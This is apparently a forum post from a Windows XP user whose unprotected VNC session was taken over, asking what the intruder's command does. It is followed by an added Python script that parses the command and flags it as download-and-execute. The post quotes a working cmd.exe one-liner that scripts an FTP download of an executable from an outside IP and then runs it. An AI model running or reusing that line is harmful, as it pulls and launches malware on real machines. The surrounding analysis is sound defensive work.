I am running on a PentiumM, 1.8G laptop, WinXP 5.1, SP2 with all updates. I have a router/firewall, and opened up the VNC ports for someone to view my computer. Unfortunately, I removed the password to make it easier for our customer. Within 10 minutes after our session and before I closed up the port, I see strange activity on my computer and realize someone else jumped on. They opened up the start>run and tried to execute the following line:
cmd.exe /c del i&echo open 18.104.22.168 17313 > i&echo user 1 1 >> i &echo get 320.exe >> i &echo quit >> i &ftp -n -s:i &320.exe&del i&exit
Whois results in OrgName: Conway Corporation
I think I closed down the DOS window and port in time, but am not sure.
The above line looks to be getting my pc to download a file from them and then execute it. I am guessing bad things would then happen.
So, can someone let me know the following:
1. What does this do?
2. Should I report this to anyone? Conway Corp?
To me, this is a big deal, considering they detected my open port within 15 minutes, so they are probing VNC ports, and given what I could have lost depending on their next actions. I can get only so much satisfaction by pinging their computer...
And yes, I know the correct answer is to not open up VNC ever again without a password. Lesson learned! To be safe, I backed up my laptop and am now running through your spyware/virus programs to clean up anything.
Thanks for any assistance. I appreciate all of the help from this site and use it often.
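For question 1 above, as an added example that is not part of the original post: a small Python analyzer that splits the quoted one-liner into its steps, rebuilds the FTP script it writes into the file `i`, and flags the fetch-then-run pattern. The function name `analyze` and the result keys are assumptions made for this illustration.

```python
import re

# Command line quoted in the post above, copied as it appears on the page.
OBSERVED = ("cmd.exe /c del i&echo open 18.104.22.168 17313 > i&echo user 1 1 >> i "
            "&echo get 320.exe >> i &echo quit >> i &ftp -n -s:i &320.exe&del i&exit")

ECHO_REDIRECT = re.compile(r"^echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.I)
# Windows ftp.exe: -n suppresses auto-login, -s:FILE reads commands from FILE.
FTP_SCRIPTED = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)


def analyze(cmdline):
    """Split a cmd.exe '&' chain and rebuild the FTP script it writes via echo.

    Simplification: splits on every '&' and ignores quoting and '^' escapes.
    """
    body = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    steps = [s.strip() for s in body.split("&") if s.strip()]
    files = {}  # file name -> lines written to it by echo redirects
    result = {"steps": steps, "ftp_script": None, "server": None,
              "fetched": [], "executed": []}
    for step in steps:
        m = ECHO_REDIRECT.match(step)
        if m:
            text, op, name = m.groups()
            if op == ">":          # '>' truncates, '>>' appends
                files[name] = []
            files.setdefault(name, []).append(text)
            continue
        m = FTP_SCRIPTED.match(step)
        if m:
            result["ftp_script"] = files.get(m.group(1), [])
            for line in result["ftp_script"]:
                parts = line.split()
                if len(parts) >= 3 and parts[0].lower() == "open":
                    result["server"] = (parts[1], parts[2])
                elif len(parts) >= 2 and parts[0].lower() == "get":
                    result["fetched"].append(parts[1])
            continue
        if step.split()[0] in result["fetched"]:   # runs a file it just fetched
            result["executed"].append(step.split()[0])
    result["download_and_execute"] = bool(result["executed"])
    return result


if __name__ == "__main__":
    for key, value in analyze(OBSERVED).items():
        print(f"{key}: {value}")
```

The same sequence (echo redirects building a script file, `ftp -s:` pointed at that file, then a step that runs the fetched name) is what to look for in process-creation logs on hosts with exposed remote-desktop services.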